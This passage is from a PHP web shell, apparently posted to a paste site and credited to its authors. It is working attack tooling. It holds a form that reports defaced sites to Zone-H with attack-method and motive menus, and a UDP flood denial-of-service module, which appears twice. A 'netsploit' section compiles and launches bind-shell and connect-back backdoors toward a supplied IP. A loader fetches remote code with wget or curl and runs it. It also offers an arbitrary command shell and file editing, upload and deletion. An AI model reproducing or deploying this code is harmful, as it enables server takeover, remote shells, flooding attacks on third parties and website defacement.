  1156.    <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  1157.    <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  1158.    <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  1159.    <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  1160.    <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  1161.    <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  1162.    <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  1163.    <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  1164.    <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  1165.    <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  1166.    option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  1167.    </select> <br>
  1168.    
  1169.    <select class="inputz" name="reason">
  1170.    <option >------------------------------------SELECT-------------------------------------</option>
  1171.    <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  1172.    <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  1173.    <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  1174.    <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  1175.    <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  1176.    <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  1177.    <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  1178.    option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  1179.    </select> <br>
  1180.    <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  1181.    <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  1182.    </form>'; ?>
  1183.     <?
  1184.         echo "</form></center>";?>
  1185.     <?
  1186.     function ZoneH($url, $hacker, $hackmode,$reson, $site )
  1187.     {
  1188.         $k = curl_init();
  1189.         curl_setopt($k, CURLOPT_URL, $url);
  1190.         curl_setopt($k,CURLOPT_POST,true);
  1191.         curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  1192.         curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  1193.         curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  1194.         $kubra = curl_exec($k);
  1195.         curl_close($k);
  1196.         return $kubra;
  1197.     }
  1198.     {
  1199.                     ob_start();
  1200.                     $sub = @get_loaded_extensions();
  1201.                     if(!in_array("curl", $sub))
  1202.                     {
  1203.                         die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  1204.                     }
  1205.                  
  1206.                     $hacker = $_POST['defacer'];
  1207.                     $method = $_POST['hackmode'];
  1208.                     $neden = $_POST['reason'];
  1209.                     $site = $_POST['domain'];
  1210.                      
  1211.                     if (empty($hacker))
  1212.                     {
  1213.                         die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  1214.                     }
  1215.                     elseif($method == "--------SELECT--------")  
  1216.                     {
  1217.                         die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  1218.                     }
  1219.                     elseif($neden == "--------SELECT--------")  
  1220.                     {
  1221.                         die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  1222.                     }
  1223.                     elseif(empty($site))  
  1224.                     {
  1225.                         die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  1226.                     }
  1227.                     $i = 0;
  1228.                     $sites = explode("\n", $site);
  1229.                     while($i < count($sites))  
  1230.                     {
  1231.                         if(substr($sites[$i], 0, 4) != "http")  
  1232.                         {
  1233.                             $sites[$i] = "http://".$sites[$i];
  1234.                         }
  1235.                         ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  1236.                         echo "Domain : ".$sites[$i]." Defaced Last Years !";
  1237.                         ++$i;
  1238.                     }
  1239.                     echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
  1240.                 }
  1241.     ?>
  1242.     <?php }
  1243.      
  1244.     elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  1245.             {      
  1246.             ?>
  1247.             <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  1248.             <?php
  1249.            
  1250.             //UDP
  1251.             if(isset($_GET['host'])&&isset($_GET['time']))
  1252.                     {
  1253.                     $packets = 0;
  1254.                     ignore_user_abort(TRUE);
  1255.                     set_time_limit(0);
  1256.                    
  1257.                     $exec_time = $_GET['time'];
  1258.                    
  1259.                     $time = time();
  1260.                     //print "Started: ".time('d-m-y h:i:s')."<br>";
  1261.                     $max_time = $time+$exec_time;
  1262.                    
  1263.                     $host = $_GET['host'];
  1264.                    
  1265.                     for($i=0;$i<65000;$i++){
  1266.                             $out .= 'X';
  1267.                     }
  1268.                    
  1269.                     while(1){
  1270.                             $packets++;
  1271.                             if(time() > $max_time){ break; }
  1272.                             $rand = rand(1,65000);
  1273.                             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  1274.                             if($fp){
  1275.                                     fwrite($fp, $out);
  1276.                                     fclose($fp);
  1277.                             }
  1278.                     }
  1279.            
  1280.                     echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  1281.                     echo '<br><br>
  1282.                    <form action="'.$surl.'" method=GET>
  1283.                            <input type="hidden" name="act" value="phptools">
  1284.                            Host: <br><input type=text name=host><br>
  1285.                            Length (seconds): <br><input type=text name=time><br>
  1286.                            <input type=submit value=Go>
  1287.                    </form>';
  1288.                     }
  1289.             else
  1290.                     {
  1291.                     echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  1292.                            <table class="tabnet" style="width:300px;">
  1293.                                    <tr>
  1294.                                            <th colspan="2">UDP Flood</th>
  1295.                                    </tr>
  1296.                                    <tr>
  1297.                                            <td>&nbsp;&nbsp;Host</td>
  1298.                                            <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  1299.                                    </tr>
  1300.                                    <tr>
  1301.                                            <td>&nbsp;&nbsp;Length (seconds)</td>
  1302.                                            <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  1303.                                    </tr>
  1304.                                    <tr>
  1305.                                            <td><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td>
  1306.                                    </tr>
  1307.                            </table>
  1308.                          </center>';
  1309.                     }
  1310.             }
  1311.      
  1312.     elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  1313.             {      
  1314.             ?>
  1315.             <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  1316.             <?php
  1317.            
  1318.             //UDP
  1319.             if(isset($_GET['host'])&&isset($_GET['time']))
  1320.                     {
  1321.                     $packets = 0;
  1322.                     ignore_user_abort(TRUE);
  1323.                     set_time_limit(0);
  1324.                    
  1325.                     $exec_time = $_GET['time'];
  1326.                    
  1327.                     $time = time();
  1328.                     //print "Started: ".time('d-m-y h:i:s')."<br>";
  1329.                     $max_time = $time+$exec_time;
  1330.                    
  1331.                     $host = $_GET['host'];
  1332.                    
  1333.                     for($i=0;$i<65000;$i++){
  1334.                             $out .= 'X';
  1335.                     }
  1336.                    
  1337.                     while(1){
  1338.                             $packets++;
  1339.                             if(time() > $max_time){ break; }
  1340.                             $rand = rand(1,65000);
  1341.                             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  1342.                             if($fp){
  1343.                                     fwrite($fp, $out);
  1344.                                     fclose($fp);
  1345.                             }
  1346.                     }
  1347.            
  1348.                     echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  1349.                     echo '<br><br>
  1350.                    <form action="'.$surl.'" method=GET>
  1351.                            <input type="hidden" name="act" value="phptools">
  1352.                            Host: <br><input type=text name=host><br>
  1353.                            Length (seconds): <br><input type=text name=time><br>
  1354.                            <input type=submit value=Go>
  1355.                    </form>';
  1356.                     }
  1357.             else
  1358.                     {
  1359.                     echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  1360.                            <table class="tabnet" style="width:300px;">
  1361.                                    <tr>
  1362.                                            <th colspan="2">UDP Flood</th>
  1363.                                    </tr>
  1364.                                    <tr>
  1365.                                            <td>&nbsp;&nbsp;Host</td>
  1366.                                            <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  1367.                                    </tr>
  1368.                                    <tr>
  1369.                                            <td>&nbsp;&nbsp;Length (seconds)</td>
  1370.                                            <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  1371.                                    </tr>
  1372.                                    <tr>
  1373.                                            <td><input style="width:100%;" class="inputzbut" type="submit" value="Go" /></td>
  1374.                                    </tr>
  1375.                            </table>
  1376.                          </center>';
  1377.                     }
  1378.             }
  1379.      
  1380.      
  1381.     elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo'))
  1382.             {
  1383.             @ob_start();
  1384.             @eval("phpinfo();");
  1385.             $buff = @ob_get_contents();
  1386.             @ob_end_clean();
  1387.             $awal = strpos($buff,"<body>")+6;
  1388.             $akhir = strpos($buff,"</body>");
  1389.             echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  1390.             }
  1391.      
  1392.     elseif(isset($_GET['view']) && ($_GET['view'] != ""))
  1393.             {
  1394.             if(is_file($_GET['view']))
  1395.                     {
  1396.                     if(!isset($file)) $file = magicboom($_GET['view']);
  1397.                     if(!$win && $posix)
  1398.                             {
  1399.                             $name=@posix_getpwuid(@fileowner($file));
  1400.                             $group=@posix_getgrgid(@filegroup($file));
  1401.                             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  1402.                             }
  1403.                     else { $owner = $user; }
  1404.                     $filn = basename($file);
  1405.                     echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  1406.                            <tr>
  1407.                                    <td>Filename</td>
  1408.                                    <td>
  1409.                                            <span id=\"".clearspace($filn)."_link\">".$file."</span>
  1410.                                            <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  1411.                                                    <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  1412.                                                    <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  1413.                                                    <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1414.                                                    <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  1415.                                                            onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  1416.                                            </form>
  1417.                                    </td>
  1418.                            </tr>
  1419.                            <tr>
  1420.                                    <td>Size</td>
  1421.                                    <td>".ukuran($file)."</td>
  1422.                            </tr>
  1423.                            <tr>
  1424.                                    <td>Permission</td>
  1425.                                    <td>".get_perms($file)."</td>
  1426.                            </tr>
  1427.                            <tr>
  1428.                                    <td>Owner</td>
  1429.                                    <td>".$owner."</td>
  1430.                            </tr>
  1431.                            <tr>
  1432.                                    <td>Create time</td>
  1433.                                    <td>".date("d-M-Y H:i",@filectime($file))."</td>
  1434.                            </tr>
  1435.                            <tr>
  1436.                                    <td>Last modified</td>
  1437.                                    <td>".date("d-M-Y H:i",@filemtime($file))."</td>
  1438.                            </tr>
  1439.                            <tr>
  1440.                                    <td>Last accessed</td>
  1441.                                    <td>".date("d-M-Y H:i",@fileatime($file))."</td>
  1442.                            </tr>
  1443.                            <tr>
  1444.                                    <td>Actions</td>
  1445.                                    <td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
  1446.                                            | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
  1447.                                            | <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
  1448.                                            | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
  1449.                                    </td>
  1450.                            </tr>
  1451.                            <tr>
  1452.                                    <td>View</td>
  1453.                                    <td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a>
  1454.                                            | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a>
  1455.                                            | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">img</a>
  1456.                                    </td>
  1457.                            </tr>
  1458.                    </table> ";
  1459.                     if(isset($_GET['type']) && ($_GET['type']=='image'))
  1460.                             { echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; }
  1461.                     elseif(isset($_GET['type']) && ($_GET['type']=='code'))
  1462.                             { echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; }
  1463.                     else    { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; }
  1464.                     }
  1465.             elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); }
  1466.             }
  1467.      
  1468.     elseif(isset($_GET['edit']) && ($_GET['edit'] != ""))
  1469.             {
  1470.             if(isset($_POST['save']))
  1471.                     {
  1472.                     $file = $_POST['saveas'];
  1473.                     $content = magicboom($_POST['content']);
  1474.                     if($filez = @fopen($file,"w"))
  1475.                             {
  1476.                             $time = date("d-M-Y H:i",time());
  1477.                             if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  1478.                             else $msg = "failed to save"; @fclose($filez);
  1479.                             }
  1480.                     else $msg = "permission denied";
  1481.                     }
  1482.             if(!isset($file)) $file = $_GET['edit'];
  1483.             if($filez = @fopen($file,"r"))
  1484.                     {
  1485.                     $content = "";
  1486.                     while(!feof($filez))
  1487.                             {
  1488.                             $content .= htmlentities(str_replace("''","'",fgets($filez)));
  1489.                             }
  1490.                     @fclose($filez);
  1491.                     } ?>
  1492.             <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  1493.                     <table class="cmdbox">
  1494.                             <tr>
  1495.                                     <td colspan="2">
  1496.                                     <textarea class="output" name="content"> <?php echo $content; ?> </textarea>
  1497.                                     </td>
  1498.                             <tr>
  1499.                                     <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  1500.                                     <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?>
  1501.                                     </td>
  1502.                             </tr>
  1503.                     </table>
  1504.             </form>
  1505.     <?php
  1506.             }
  1507.      
  1508.     elseif(isset($_GET['x']) && ($_GET['x'] == 'upload'))
  1509.             {
  1510.             if(isset($_POST['uploadcomp']))
  1511.                     {
  1512.                     if(is_uploaded_file($_FILES['file']['tmp_name']))
  1513.                             {
  1514.                             $path = magicboom($_POST['path']);
  1515.                             $fname = $_FILES['file']['name'];
  1516.                             $tmp_name = $_FILES['file']['tmp_name'];
  1517.                             $pindah = $path.$fname;
  1518.                             $stat = @move_uploaded_file($tmp_name,$pindah);
  1519.                             if ($stat) { $msg = "file uploaded to $pindah"; }
  1520.                             else $msg = "failed to upload $fname";
  1521.                             }
  1522.                     else $msg = "failed to upload $fname";
  1523.                     }
  1524.             elseif(isset($_POST['uploadurl']))
  1525.                     {
  1526.                     $pilihan = trim($_POST['pilihan']);
  1527.                     $wurl = trim($_POST['wurl']);
  1528.                     $path = magicboom($_POST['path']);
  1529.                     $namafile = download($pilihan,$wurl);
  1530.                     $pindah = $path.$namafile;
  1531.                     if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
  1532.                     else $msg = "failed ! to upload $namafile"; }
  1533.             ?>
  1534.             <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  1535.                     <table class="tabnet" style="width:320px;padding:0 1px;">
  1536.                             <tr>
  1537.                                     <th colspan="2">Upload from computer</th>
  1538.                             </tr>
  1539.                             <tr>
  1540.                                     <td colspan="2">
  1541.                                             <p style="text-align:center;">
  1542.                                             <input style="color:#000000;" type="file" name="file" />
  1543.                                             <input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;">
  1544.                                             </p>
  1545.                                     </td>
  1546.                             </tr>
  1547.                             <tr>
  1548.                                     <td colspan="2">
  1549.                                             <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" />
  1550.                                     </td>
  1551.                             </tr>
  1552.                     </table>
  1553.             </form>
  1554.             <table class="tabnet" style="width:320px;padding:0 1px;">
  1555.                     <tr>
  1556.                             <th colspan="2">Upload from url</th>
  1557.                     </tr>
  1558.                     <tr>
  1559.                             <td colspan="2">
  1560.                                     <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  1561.                                             <table>
  1562.                                                     <tr>
  1563.                                                             <td>url</td>
  1564.                                                             <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td>
  1565.                                                     </tr>
  1566.                                                     <tr>
  1567.                                                             <td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
  1568.                                                     </tr>
  1569.                                                     <tr>
  1570.                                                             <td>
  1571.                                                             <select size="1" class="inputz" name="pilihan">
  1572.                                                                     <option value="wwget">wget</option>
  1573.                                                                     <option value="wlynx">lynx</option>
  1574.                                                                     <option value="wfread">fread</option>
  1575.                                                                     <option value="wfetch">fetch</option>
  1576.                                                                     <option value="wlinks">links</option>
  1577.                                                                     <option value="wget">GET</option>
  1578.                                                                     <option value="wcurl">curl</option>
  1579.                                                             </select>
  1580.                                                             </td>
  1581.                                                             <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td>
  1582.                                                     </tr>
  1583.                                             </table>
  1584.                                     </form>
  1585.                             </td>
  1586.                     </tr>
  1587.             </table>
  1588.             <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  1589.     <?php }
  1590.      
  1591.     elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
  1592.             {
  1593.             if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  1594.                     {      
  1595.                     $port = trim($_POST['port']);
  1596.                     $passwrd = trim($_POST['bind_pass']);
  1597.                     tulis("bdc.c",$port_bind_bd_c);
  1598.                     exe("gcc -o bdc bdc.c");
  1599.                     exe("chmod 777 bdc");
  1600.                     @unlink("bdc.c");
  1601.                     exe("./bdc ".$port." ".$passwrd." &");
  1602.                     $scan = exe("ps aux");
  1603.                     if(eregi("./bdc $por",$scan))
  1604.                             {
  1605.                             $msg = "<p>Process found running, backdoor setup successfully.</p>";
  1606.                             }
  1607.                     else
  1608.                             {
  1609.                             $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  1610.                             }
  1611.                     }
  1612.             elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  1613.                     {
  1614.                     $port = trim($_POST['port']);
  1615.                     $passwrd = trim($_POST['bind_pass']);
  1616.                     tulis("bdp",$port_bind_bd_pl);
  1617.                     exe("chmod 777 bdp");
  1618.                     $p2=which("perl");
  1619.                     exe($p2." bdp ".$port." &");
  1620.                     $scan = exe("ps aux");
  1621.                     if(eregi("$p2 bdp $port",$scan))
  1622.                             { $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  1623.                     else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
  1624.             elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  1625.                     {
  1626.                     $ip = trim($_POST['ip']);
  1627.                     $port = trim($_POST['backport']);
  1628.                     tulis("bcc.c",$back_connect_c);
  1629.                     exe("gcc -o bcc bcc.c");
  1630.                     exe("chmod 777 bcc");
  1631.                     @unlink("bcc.c");
  1632.                     exe("./bcc ".$ip." ".$port." &");
  1633.                     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  1634.                     }
  1635.             elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  1636.                     {
  1637.                     $ip = trim($_POST['ip']);
  1638.                     $port = trim($_POST['backport']);
  1639.                     tulis("bcp",$back_connect);
  1640.                     exe("chmod +x bcp");
  1641.                     $p2=which("perl");
  1642.                     exe($p2." bcp ".$ip." ".$port." &");
  1643.                     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  1644.                     }
  1645.             elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  1646.                     {
  1647.                     $pilihan = trim($_POST['pilihan']);
  1648.                     $wurl = trim($_POST['wurl']);
  1649.                     $namafile = download($pilihan,$wurl);
  1650.                     if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; }
  1651.             ?>
  1652.             <table class="tabnet">
  1653.                     <tr>
  1654.                             <th>Port Binding</th>
  1655.                             <th>Connect Back</th>
  1656.                             <th>Load and Exploit</th>
  1657.                     </tr>
  1658.                     <tr>
  1659.                             <td>
  1660.                                     <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  1661.                                     <table>
  1662.                                             <tr>
  1663.                                                     <td>Port</td>
  1664.                                                     <td>
  1665.                                                     <input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>">
  1666.                                                     </td>
  1667.                                             </tr>
  1668.                                             <tr>
  1669.                                                     <td>Password</td>
  1670.                                                     <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td>
  1671.                                             </tr>
  1672.                                             <tr>
  1673.                                                     <td>Use</td>
  1674.                                                     <td style="text-align:justify">
  1675.                                                             <p>
  1676.                                                             <select class="inputz" size="1" name="use">
  1677.                                                                     <option value="Perl">Perl</option>
  1678.                                                                     <option value="C">C</option>
  1679.                                                             </select>
  1680.                                                             <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
  1681.                                                     </td>
  1682.                                             </tr>
  1683.                                     </table>
  1684.                                     </form>
  1685.                             </td>
  1686.                             <td>
  1687.                                     <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  1688.                                     <table>
  1689.                                             <tr>
  1690.                                                     <td>IP</td>
  1691.                                                     <td>
  1692.                                                     <input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
  1693.                                                     </td>
  1694.                                             </tr>
  1695.                                             <tr>
  1696.                                                     <td>Port</td>
  1697.                                                     <td>
  1698.                                                     <input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>">
  1699.                                                     </td>
  1700.                                             </tr>
  1701.                                             <tr>
  1702.                                                     <td>Use</td>
  1703.                                                     <td style="text-align:justify">
  1704.                                                             <p>
  1705.                                                             <select size="1" class="inputz" name="use">
  1706.                                                                     <option value="Perl">Perl</option>
  1707.                                                                     <option value="C">C</option>
  1708.                                                             </select>
  1709.                                                             <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
  1710.                                                     </td>
  1711.                                             </tr>
  1712.                                     </table>
  1713.                                     </form>
  1714.                             </td>
  1715.                             <td>
  1716.                                     <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  1717.                                     <table>
  1718.                                             <tr>
  1719.                                                     <td>url</td>
  1720.                                                     <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
  1721.                                             </tr>
  1722.                                             <tr>
  1723.                                                     <td>cmd</td>
  1724.                                                     <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  1725.                                             </tr>
  1726.                                             <tr>
  1727.                                                     <td>
  1728.                                                     <select size="1" class="inputz" name="pilihan">
  1729.                                                             <option value="wwget">wget</option>
  1730.                                                             <option value="wlynx">lynx</option>
  1731.                                                             <option value="wfread">fread</option>
  1732.                                                             <option value="wfetch">fetch</option>
  1733.                                                             <option value="wlinks">links</option>
  1734.                                                             <option value="wget">GET</option>
  1735.                                                             <option value="wcurl">curl</option>
  1736.                                                     </select>
  1737.                                                     </td>
  1738.                                                     <td colspan="2">
  1739.                                                             <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
  1740.                                                     </td>
  1741.                                             </tr>
  1742.                                     </table>
  1743.                                     </form>
  1744.                             </td>
  1745.                     </tr>
  1746.             </table>
  1747.             <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  1748.     <?php }
  1749.      
  1750.     elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
  1751.             {
  1752.             ?>
  1753.             <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  1754.                     <table class="cmdbox">
  1755.                             <tr>
  1756.                                     <td colspan="2">
  1757.                                     <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  1758.                                     </td>
  1759.                             </tr>
  1760.                             <tr>
  1761.                                     <td colspan="2"><?php echo $prompt; ?>
  1762.                                     <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
  1763.                                     <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
  1764.                                     </td>
  1765.                             </tr>
  1766.                     </table>
  1767.             </form> <?php
  1768.             }
  1769.     else
  1770.             {
  1771.             if(isset($_GET['delete']) && ($_GET['delete'] != ""))
  1772.                     {
  1773.                     $file = $_GET['delete']; @unlink($file);
  1774.                     }
  1775.             elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
  1776.                     {
  1777.                     @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  1778.                     }
  1779.             elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
  1780.                     {
  1781.                     $path = $pwd.$_GET['mkdir']; @mkdir($path);
  1782.                     }
  1783.             $buff = showdir($pwd,$prompt);
  1784.             echo $buff;
  1785.             } ?>
  1786.      
  1787.     <center><br>Coded by Joker & P.K Newbie3viLc063s 2010-2012</br></center>
  1788.      
  1789.                     </div>
  1790.             </body>
  1791.     </html><?
Add Comment
Please, Sign In to add comment